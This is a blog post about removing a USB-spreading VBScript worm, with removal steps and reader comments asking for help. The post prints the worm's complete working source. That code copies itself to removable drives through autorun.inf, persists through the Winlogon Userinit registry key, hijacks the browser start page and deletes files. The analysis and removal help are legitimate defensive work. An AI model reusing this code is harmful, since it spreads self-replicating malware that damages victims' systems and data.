The great wonder that i discovered while going through the source code is this worm actually deleted few other common threats that spread through the pen drive. So probably the intention of Rahul the Hacker was good? but then why set the homepage to a rogue link permanently?
My antivirus is outdated and was not able to remove it.
- To easily remove the worm loginto windows in safe mode.You can goto windows safe mode by hitting the F8 button continuoulsy when the windows 98 or XP OS boots up.
- After logging into windows in safe mode, goto task manager by pressing Ctrl+Alt+Delete.
- Select Wscript.exe and click on end task.
- Search and delete the files with the name "LOVERAHULSAS".
- After having deleted the script file make sure the source pen drive is formated. Restart in normal mode.
These steps will make it possible to set the homepage to anything required by you.
All the traces of the worm can be removed by deleting the entry for "RAHUL THE H@CkEr" using "HiJackThis_v2".
I got the entire source code of the worm after removing, its given below:
Source of LOVERAHULSAS.vbs
'THIS IS AN ANTI VIRUS WHICH WILL WORK AS ##'A VIRUS AND WILL ONLY REPAIR YOUR WINDOWS#'AND WONT DO ANY HARM ''HACK THE WORLD'RAHUL THE H@CkEr'@FB1-INNOVATIONS RULEZZZ'LOVERAHULSAS@GMAIL.COM'http://WWW.RAHULHACKINGARTICLE.WETPAINT.COMOption ExplicitOn Error Resume Next
Dim FOBJ,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,rootDim alertSet FOBJ = CreateObject("Scripting.FileSystemObject")Set Shells = CreateObject("Wscript.Shell")Set WinDir = FOBJ.GetSpecialFolder(0)Set SystemDir =FOBJ.GetSpecialFolder(1)Set File = FOBJ.GetFile(WScript.ScriptFullName)Set Drv = File.DriveSet InDrive = FOBJ.drivesSet ReadAll = File.OpenAsTextStream(1,-2)do while not ReadAll.atendofstreamAllFile = AllFile & ReadAll.readlineAllFile = AllFile & vbcrlfLoop
Count=Drv.DriveType
Do If Not FOBJ.FileExists(SystemDir & "\LOVERAHULSAS.vbs") then set WriteAll = FOBJ.CreateTextFile(SystemDir & "\LOVERAHULSAS.vbs",2,true) WriteAll.Write AllFile WriteAll.close set WriteAll = Fso.GetFile(SystemDir & "\LOVERAHULSAS.vbs") WriteAll.Attributes = -1alert =MsgBox("THIS IS AN ANTI-VIRUS AND WILL HELP YOUR SYSTEM TO WORK PROPERLY", 4096,"RAHUL THE H@CkEr")
End If
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","RAHUL THE H@CkeR" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.rahulhackingarticle.wetpaint.com/" Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe" Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _ SystemDir & "\wscript.exe " & SystemDir & "\LOVERAHULSAS.VBS" For Each Drives In InDrive root = Drives.Path & "\" If FOBJ.GetParentFolderName(WScript.ScriptFullName)=root Then Shells.Run "explorer.exe " & root End If Set folder=FOBJ.GetFolder(root) Set Delete = FOBJ.DeleteFile(SystemDir & "\killvbs.vbs",true)Set Delete = FOBJ.DeleteFile(SystemDir & "\virusremoval.vbs",true) For Each files In folder.Files auto=Left(files.Name,7) If UCase(auto)=UCase("autorun") Then Set Delete = FOBJ.DeleteFile(root & files.Name,true) End If Next If Drives.DriveType=2 Then delext "inf",Drives.Path & "\" delext "INF",Drives.Path & "\" End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then If Drives.Path<> "A:" Then delext "vbs",WinDir & "\" delext "vbs",Drives.Path & "\" If FOBJ.FileExists(Drives.Path & "\ravmon.exe") Then Fso.DeleteFile(Drives.Path & "\ravmon.exe") End If If FOBJ.FileExists(Drives.Path & "\sxs.exe") Then Fso.DeleteFile(Drives.Path & "\sxs.exe") End If If FOBJ.FileExists(Drives.Path & "\winfile.exe") Then FOBJ.DeleteFile(Drives.Path & "\winfile.exe") End If If FOBJ.FileExists(Drives.Path & "\run.wsh") Then FOBJ.DeleteFile(Drives.Path & "\run.wsh") End If If Drives.DriveType = 1 Then If Drives.Path<>"A:" Then
If Not FOBJ.FileExists(Drives.Path & "\LOVERAHULSAS.vbs") Then Set WriteAll=FOBJ.CreateTextFile(Drives.Path & "\LOVERAHULSAS.vbs",2,True) WriteAll.Write AllFile WriteAll.Close Set WriteAll = FOBJ.GetFile(Drives.Path & "\LOVERAHULSAS.vbs") WriteAll.Attributes = -1 End If If FOBJ.FileExists(Drives.Path & "\autorun.inf") Or FOBJ.FileExists(Drives.Path & "\AUTORUN.INF") Then Set Chg = FOBJ.GetFile(Drives.Path & "\autorun.inf") Chg.Attributes = -8 Set WriteAll = FOBJ.CreateTextFile(Drives.Path & "\autorun.inf",2,True) WriteAll.writeline "[autorun]" WriteAll.WriteLine "open=wscript.exe LOVERAHULSAS.vbs" WriteAll.WriteLine "shell\open=Open" WriteAll.WriteLine "shell\open\Command=wscript.exe LOVERAHULSAS.vbs" WriteAll.Close Set WriteAll = FOBJ.GetFile(Drives.Path & "\autorun.inf") WriteAll.Attributes = -1 else Set WriteAll = FOBJ.CreateTextFile(Drives.Path & "\autorun.inf",2,True) WriteAll.writeline "[autorun]" WriteAll.WriteLine "open=wscript.exe LOVERAHULSAS.vbs" WriteAll.WriteLine "shell\open=Open" WriteAll.WriteLine "shell\open\Command=wscript.exe LOVERAHULSAS.vbs" WriteAll.Close Set WriteAll = FOBJ.GetFile(Drives.Path & "\autorun.inf") WriteAll.Attributes = -1 End if End If End If End if End If Next
if Count <> 1 then Wscript.sleep 1000 end ifloop while Count<>1
sub delext(File2Find, SrchPath) Dim oFileSys, oFolder, oFile,Cut,Delete Set oFileSys = CreateObject("Scripting.FileSystemObject") Set oFolder = oFileSys.GetFolder(SrchPath) For Each oFile In oFolder.Files Cut=Right(oFile.Name,3) If UCase(Cut)=UCase(file2find) Then If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true) End If NextEnd sub
Content of autorun.ini
[autorun]open=wscript.exe LOVERAHULSAS.vbsshell\open=Openshell\open\Command=wscript.exe LOVERAHULSAS.vbs
8 comments:
could you please tell me the language used for writing this code.
when i started in safe mode and i pressed ctrl+alt+del and theres no Wscript.exe task running and i searced my whole computer theres no file with the name LOVERAHULSAS and when ever i boot my comp i see a window cannot find c:windows/system32/LOVERAHULSAS.vbs plz help me how cud i fix it
when i started in safe mode and i pressed ctrl+alt+del and theres no Wscript.exe task running and i searced my whole computer theres no file with the name LOVERAHULSAS and when ever i boot my comp i see a window cannot find c:windows/system32/LOVERAHULSAS.vbs plz help me how cud i fix it
Please help me with this problem i really got fed up with this......
@ Indra Teja
Just follow the steps after the step you tried. Use Hijack 2 to remove the entries. This will solve your problem.
yeah plz tell me how you use hijack 2 and wt is it??
i cannot install any thing like my winmap player is not no working and i uninstalled it and again i tried to install it but i cannt
@ Indra Tej,
First get and install a good anitvirus and run a full system scan to remove all virus.If you cant even install anti-virus, attach your hard disk to a system that has anti-virus installed and get it scanned.
For info about Hijack this-- you can read below link.
http://www.bleepingcomputer.com/tutorials/tutorial42.html
If you are not sure what you are doing, it might be better to contact a professional.
Post a Comment